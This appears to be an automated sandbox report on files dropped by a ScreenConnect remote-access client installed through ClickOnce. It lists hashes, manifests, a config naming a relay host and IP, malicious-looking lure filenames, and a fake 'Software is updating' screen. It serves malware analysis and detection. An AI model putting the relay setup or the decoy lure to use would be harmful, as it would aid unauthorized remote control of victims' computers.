                                                                                                                                                                                                                                                SHA-256:8809C269B6CE3EAB0FD5ACB819E1BD63984203466859BFEA64CF924FD6EFA4AC
                                                                                                                                                                                                                                                SHA-512:B7C65BCDED31D5A339C2693D3B9B45AE143EEECBAF3E5F3522BE909945A2580D288B57B305853A19BE86F6D9246B5012ECDFDF8DD08D4F28AB7099E454DE0827
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3032
                                                                                                                                                                                                                                                Entropy (8bit):4.875271585255285
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:WMQSc7gye6S+9oww7g47Jw+f7iI++5dFkEM6Vbjfthnwbb:WXScpeV+WwwnJwOiMRkborthnEb
                                                                                                                                                                                                                                                MD5:C99E0A14306D8B01FE649B89D8AF23DF
                                                                                                                                                                                                                                                SHA1:00B50835D5A5CC09FEBD73B1447ED1CD5B1248E3
                                                                                                                                                                                                                                                SHA-256:D12D0E85606AE37D09342D03FC1ED7E6DE1CF800433A65F053A35FBE7D1EFD14
                                                                                                                                                                                                                                                SHA-512:EA32C91E051A10B0711C6B193EAE652BCBE26C63B8A10E5306BF82BBB787D4E4664955671207B50DD2BA2993B6474072726A097F0850DDD51E8012A63B8B4A8F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14612
                                                                                                                                                                                                                                                Entropy (8bit):5.714794300101318
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:/IWh4+UIn9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:/IWp9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                                                                                                MD5:4F13544DA43FDAF497C28C7E6361DAD9
                                                                                                                                                                                                                                                SHA1:E8130F84834AB0ED89329B14B05A9D519189E9F0
                                                                                                                                                                                                                                                SHA-256:D990E51AE130511540DB33D6014491E64B0E1CE9B10A21EF5196522445C0DDA4
                                                                                                                                                                                                                                                SHA-512:6409F5A5E08981F15DC20405616FD4A45D32735536F668DBE4456CC30DB747ACCE888C41BD7DA663B010689BA8390DAE0E840EE998719E8E1CB087B53FAC2485
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):117905
                                                                                                                                                                                                                                                Entropy (8bit):5.586337100898901
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:0aN8cT51/FXvMVNWfCXq9ymhm2o9HuzhJOvP:0VcfiVI3mt8vOvP
                                                                                                                                                                                                                                                MD5:A4FE50A6C913DF40834230E7ABF10CE9
                                                                                                                                                                                                                                                SHA1:AD8C36976A5D33D1A4DE1A55F4598828C0F41A0A
                                                                                                                                                                                                                                                SHA-256:66CB8DCE9EB73D465B607088654C44D55002013B41069F74FDFF9AD42EF7AB2A
                                                                                                                                                                                                                                                SHA-512:200DCADA2C2F936E0E41B9AAF918F1F85F57D7E7388465DC8DD01E47EC2C52D28BD7BBD2B58FBA72C6040253BF5968ADAD49762F3252E45C8A842622956EB9EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4428
                                                                                                                                                                                                                                                Entropy (8bit):4.257837663320519
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ZoQKXCD5v+1gLe6S+9ow87gFW75uvWbO2MKpWpAk2Gl8mcMkoDprOaJCf:qvXQeV+Ww8U45ucO9l2GlFkoNOrf
                                                                                                                                                                                                                                                MD5:1F6370BEF7EE52A3B989438CCD4E5556
                                                                                                                                                                                                                                                SHA1:C6FCFB56BACCE2D657565C1CF963AE18C827C71C
                                                                                                                                                                                                                                                SHA-256:1253500BAAE3E19CD20D82CDE1F204E4035A26FAC67B46314422759851D14189
                                                                                                                                                                                                                                                SHA-512:1112E461A5FFEE75D03B13883E20E4D16A20B947373B59AE5F70D2C695B8A3D47F3638D697013C078BFB9A57A273CE688C7080257AB3FDF2AC3E13858D68B859
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: statmentt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: statsment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: statmentt.exe, Detection: malicious
                                                                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious
                                                                                                                                                                                                                                                • Filename: statsment.exe, Detection: malicious
                                                                                                                                                                                                                                                • Filename: , Detection: malicious
                                                                                                                                                                                                                                                • Filename: , Detection: malicious
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                • Filename: setup.msi, Detection: malicious
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious
                                                                                                                                                                                                                                                • Filename: pzPO97QouM.exe, Detection: malicious
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):569
                                                                                                                                                                                                                                                Entropy (8bit):5.0687349524326955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO4Y3IEm/vXbAa3xT:2dL9hK6E46YPzz8vH
                                                                                                                                                                                                                                                MD5:E374D37801CDEBE01DF27991F13BD78B
                                                                                                                                                                                                                                                SHA1:15FEBACF5CEB5FFB501A6ABD6384A85D625A066E
                                                                                                                                                                                                                                                SHA-256:71E7E3F4972BDD4CB98809973064F0A34A7E2377CC48E3C50017BA622E35F446
                                                                                                                                                                                                                                                SHA-512:BAFADD7B56FFAD46D64B01D860D4A269D65AD294C45BC7520F667DF5CAB2B5104DDC90E0FCD34A531093884349F349E96B5CF10344BAE261BEBD108166FCBCAE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>0bd0.adrsxpjm0rga0n.de=104.168.134.232-22%2f12%2f2024%2011%3a47%3a44</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                Entropy (8bit):4.954767818844449
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsfHwercjGu:rHy2DLI4MWoj12K9cAufHc6u
                                                                                                                                                                                                                                                MD5:9C24F61262ED0D4387EA690B3AD44A07
                                                                                                                                                                                                                                                SHA1:00C16E72CCF6A23982C266D03B8BABE31AFA93E6
                                                                                                                                                                                                                                                SHA-256:69D2A286D560A178920010EE592F73CE28B2CCB3C564766F4B78951C7F220A40
                                                                                                                                                                                                                                                SHA-512:0E787D5923D8918648968FC234D04D30AD0C8B3D2DC8D050B2E59012C40E2CB28D48C409C321DCB09CB78117C0A71F3C01080DB96F36EED9F3BD1FDD5A3AE1FE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......;Software is updating... Please do not turn off your device.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50133
                                                                                                                                                                                                                                                Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
